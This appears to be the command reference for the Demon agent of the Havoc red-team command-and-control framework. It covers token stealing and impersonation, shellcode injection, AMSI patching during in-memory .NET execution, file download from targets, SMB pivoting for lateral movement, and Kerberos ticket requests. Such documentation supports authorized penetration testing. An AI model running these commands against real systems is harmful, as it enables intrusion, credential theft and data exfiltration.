Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/HavocFramework/Havoc/llms.txt

Use this file to discover all available pages before exploring further.

Command Overview

Demon implements a comprehensive command set organized by functionality. All commands are dispatched through a central command dispatcher and executed based on the command ID.
Type help in the Demon interact window to see all available commands. Use help [command] for detailed information about a specific command.

Session Management

checkin

Request a full checkin from the Demon agent. 
checkin
Output includes:
  • Magic values for verification
  • First and last call timestamps
  • AES encryption key and IV
  • Current sleep delay and jitter
  • Request ID tracking
  • Computer hostname
  • Current username and domain
  • Internal IP addresses
  • Network adapter information
  • Process name and path
  • Process architecture (x86/x64)
  • Process ID (PID)
  • Parent Process ID (PPID)
  • Elevated/Integrity level
  • Windows version
  • Build number
  • OS architecture

sleep

Modify the agent’s sleep interval and jitter. 
sleep [seconds] [jitter_percent]
Examples: 
sleep 5        # Sleep 5 seconds with existing jitter
sleep 10 20    # Sleep 10 seconds with 20% jitter
sleep 0        # Interactive mode (no sleep)
Behavior:
  • With jitter, actual sleep time varies: sleep ± (sleep * jitter / 100)
  • Sleep of 0 enables interactive mode for real-time operations
  • Sleep obfuscation only occurs when sleep > 0 and no jobs running
Working hours and kill date restrictions still apply even with modified sleep values.

exit

Terminate the Demon agent. 
exit
This command causes the agent to terminate immediately. There is no recovery once executed.
Cleanup actions:
  • Closes all handles
  • Frees allocated memory
  • Terminates all job threads
  • Exits process cleanly

Process Management

proc list

Enumerate running processes on the target system. 
proc list
Output columns:
  • Process Name
  • PID (Process ID)
  • PPID (Parent Process ID)
  • Architecture (x86/x64)
  • Username (if accessible)
  • Session ID
Implementation: Uses CreateToolhelp32Snapshot and Process32FirstW/Process32NextW

proc kill

Terminate a process by PID. 
proc kill [pid]
Example: 
proc kill 1234
Method: Opens process with PROCESS_TERMINATE access and calls NtTerminateProcess (via syscall if configured).

proc create

Spawn a new process in suspended or running state. 
proc create [state] [path] [args]
States:
  • suspended - Process created in suspended state
  • normal - Process starts immediately
Examples: 
proc create normal C:\Windows\System32\cmd.exe /c whoami
proc create suspended C:\Windows\System32\notepad.exe
Use cases:
  • Suspended: For process injection targets
  • Normal: Execute commands and capture output

proc module

List loaded modules in a target process. 
proc module [pid]
Output:
  • Module name
  • Base address
  • Module size
  • Full path
Use case: Identify loaded DLLs for injection or hijacking opportunities

proc grep

Search for processes by name. 
proc grep [process_name]
Example: 
proc grep chrome
Output: All processes matching the search term with full details

proc memory

Query memory regions in a target process. 
proc memory [pid] [protection]
Protection values:
  • PAGE_EXECUTE_READ (0x20)
  • PAGE_EXECUTE_READWRITE (0x40)
  • PAGE_READWRITE (0x04)
Example: 
proc memory 1234 0x40  # Find RWX regions
Output: Base address, size, and protection of matching memory regions

File System Operations

fs dir

List directory contents. 
fs dir [path]
Example: 
fs dir C:\Users\Public
Output:
  • File/Directory name
  • Size
  • Last modified time
  • Attributes (Hidden, System, Archive, etc.)

fs cd

Change current working directory. 
fs cd [path]
Example: 
fs cd C:\Windows\Temp

fs pwd

Print current working directory. 
fs pwd

fs download

Download a file from the target to the teamserver. 
fs download [remote_path]
Features:
  • Chunked transfer (configurable chunk size)
  • Progress tracking
  • Automatic resumption on failure
Example: 
fs download C:\Users\Admin\Documents\secrets.txt
Large files are automatically split into chunks. Check download progress with the transfer command.

fs upload

Upload a file from the teamserver to the target. 
fs upload [local_path] [remote_path]
Example: 
fs upload /tmp/tool.exe C:\Windows\Temp\tool.exe

fs cat

Read and display file contents. 
fs cat [path]
Example: 
fs cat C:\Windows\System32\drivers\etc\hosts
Large files will be truncated in output. Use fs download for large files.

fs remove

Delete a file. 
fs remove [path]
Example: 
fs remove C:\Windows\Temp\artifact.exe

fs mkdir

Create a directory. 
fs mkdir [path]

fs copy

Copy a file or directory. 
fs copy [source] [destination]

fs move

Move or rename a file. 
fs move [source] [destination]

Token Management

token getuid

Display current user context. 
token getuid
Output:
  • Username
  • Domain
  • SID
  • Integrity level
  • Token type

token list

List all tokens in the token vault. 
token list
Output for each token:
  • Token ID (for impersonation)
  • Username
  • Domain
  • Token type (Primary/Impersonation)
  • Session ID

token find-tokens

Scan the system for accessible tokens. 
token find-tokens
Process:
  1. Enumerate all running processes
  2. Attempt to open process token
  3. Query token information
  4. Display accessible tokens
Use case: Identify privilege escalation opportunities

token steal

Steal a token from a process and add to vault. 
token steal [pid] [handle_optional]
Examples: 
token steal 1234              # Steal process token
token steal 1234 0x100        # Steal specific handle
Process:
  1. Open target process
  2. Open process token or duplicate specified handle
  3. Duplicate token with SecurityIdentification and SecurityImpersonation
  4. Store in token vault
  5. Return token ID

token impersonate

Apply a token from the vault to the current thread. 
token impersonate [id]
Example: 
token impersonate 3  # Use token ID from 'token list'
Effect: All subsequent operations execute under the impersonated user context
Impersonation affects the current thread. Use token revert to return to the original token.

token revert

Revert to the default process token. 
token revert
Implementation: Calls RevertToSelf() to remove thread impersonation

token remove

Remove a token from the vault. 
token remove [id]

token clear

Remove all tokens from the vault. 
token clear

token make

Create a token from credentials. 
token make [domain] [username] [password]
Example: 
token make CORP john.doe Password123!
Methods:
  • LogonUserW with LOGON32_LOGON_NETWORK (Type 3)
  • Token added to vault automatically

token privs-get

Attempt to enable all privileges on current token. 
token privs-get
Common privileges enabled:
  • SeDebugPrivilege
  • SeImpersonatePrivilege
  • SeLoadDriverPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege

token privs-list

List all privileges and their states. 
token privs-list
Output:
  • Privilege name
  • State (Enabled/Disabled)
  • Attributes

Code Execution

inline-execute

Execute a Beacon Object File (BOF) in-memory. 
inline-execute [path_to_bof] [args]
Example: 
inline-execute /root/bofs/whoami.o
Features:
  • COFF parsing and linking
  • Beacon API compatibility
  • Output capture
  • Optional VEH crash protection
  • Thread-based execution (if configured)
Inline Mode (CoffeeThreaded: false)
  • Executes in current thread
  • Fastest performance
  • No job management
  • Crash will terminate agent
Threaded Mode (CoffeeThreaded: true)
  • Executes in separate thread
  • Manageable via job commands
  • Isolated from main agent
  • VEH can catch crashes

dotnet inline-execute

Execute a .NET assembly in-memory. 
dotnet inline-execute [path_to_assembly] [args]
Example: 
dotnet inline-execute /root/Seatbelt.exe -group=all
Process:
  1. Initialize CLR (if not already loaded)
  2. Patch AMSI in amsi.dll
  3. Create AppDomain
  4. Load assembly from memory
  5. Invoke entry point with arguments
  6. Capture console output
OPSEC: Loading the CLR is irreversible and increases process footprint. The CLR remains loaded for the lifetime of the process.

dotnet list-versions

List installed .NET Framework versions. 
dotnet list-versions
Output: All installed .NET versions detected in the registry

shellcode inject

Inject shellcode into a remote process. 
shellcode inject [arch] [pid] [path_to_shellcode]
Example: 
shellcode inject x64 1234 /tmp/payload.bin
See Injection Techniques for detailed documentation.

shellcode spawn

Spawn a sacrificial process and inject shellcode (fork & run). 
shellcode spawn [arch] [path_to_shellcode]
Example: 
shellcode spawn x64 /tmp/payload.bin
Process:
  1. Spawn configured process in suspended state
  2. Allocate memory in target
  3. Write shellcode
  4. Create remote thread
  5. Resume process

Network Commands

net domain

Query domain information. 
net domain
Output:
  • Domain name
  • Domain controller
  • Forest information

net dclist

Enumerate domain controllers. 
net dclist [domain]

net logons

Enumerate logged-on users. 
net logons [computer]
API: NetWkstaUserEnum

net sessions

Enumerate active sessions on a computer. 
net sessions [computer]
API: NetSessionEnum

net localgroup

Enumerate local groups. 
net localgroup [computer]
API: NetLocalGroupEnum

net group

Enumerate domain groups. 
net group [domain]

net user

Enumerate users. 
net user [domain]

net share

Enumerate shares on a computer. 
net share [computer]
API: NetShareEnum

Job Management

job list

List all running jobs. 
job list
Output:
  • Job ID
  • Job type (BOF, Download, etc.)
  • State (Running, Suspended)
  • Thread ID

job suspend

Suspend a running job. 
job suspend [id]
Example: 
job suspend 1
Implementation: Calls NtSuspendThread on the job’s thread

job resume

Resume a suspended job. 
job resume [id]
Implementation: Calls NtResumeThread

job kill

Terminate and remove a job. 
job kill [id]
Process:
  1. Suspend thread
  2. Terminate thread
  3. Free allocated resources
  4. Remove from job list
Sleep obfuscation is disabled while jobs are running. Kill or suspend jobs to enable sleep obfuscation.

Transfer Management

transfer list

List active file transfers. 
transfer list
Output:
  • Transfer ID
  • Filename
  • Size
  • Progress
  • State

transfer stop

Pause a file transfer. 
transfer stop [id]

transfer resume

Resume a paused transfer. 
transfer resume [id]

transfer remove

Cancel and remove a transfer. 
transfer remove [id]

Miscellaneous Commands

screenshot

Capture a screenshot of the desktop. 
screenshot
Process:
  1. Get desktop device context
  2. Create compatible DC
  3. BitBlt to copy screen
  4. Convert to BMP format
  5. Send to teamserver
Requirements: GUI session (does not work in services or non-interactive sessions)

config

View or modify agent configuration. 
config                                      # Show all settings
config sleep [seconds] [jitter]             # Modify sleep
config injection technique [value]          # Set injection technique
config injection spawn64 [path]             # Set x64 spawn process
config injection spawn32 [path]             # Set x86 spawn process  
config memory alloc [value]                 # Set allocation method
config memory execute [value]               # Set execution method
config killdate [YYYY-MM-DD HH:MM:SS]      # Set kill date
config workinghours [HH:MM-HH:MM]          # Set working hours
Values:
  • injection technique: 1 (Win32), 2 (Syscall), 3 (APC)
  • memory alloc/execute: 1 (Win32), 2 (Syscall)

pivot

Manage SMB pivot connections. 
pivot list                          # List pivots
pivot smb-connect [hostname] [pipe] # Connect to SMB pivot
pivot smb-disconnect [id]           # Disconnect pivot
Use case: Create lateral movement paths through compromised hosts

kerberos

Kerberos ticket operations. 
kerberos list           # List cached tickets
kerberos tgt [options]  # Request TGT
kerberos tgs [options]  # Request TGS
Kerberos functionality requires appropriate privileges and network access to domain controllers.

Next Steps

Sleep Obfuscation

Configure sleep techniques for evasion

Injection Methods

Process injection techniques and OPSEC

Features Guide

Explore all Demon capabilities

Generate Payloads

Create configured Demon agents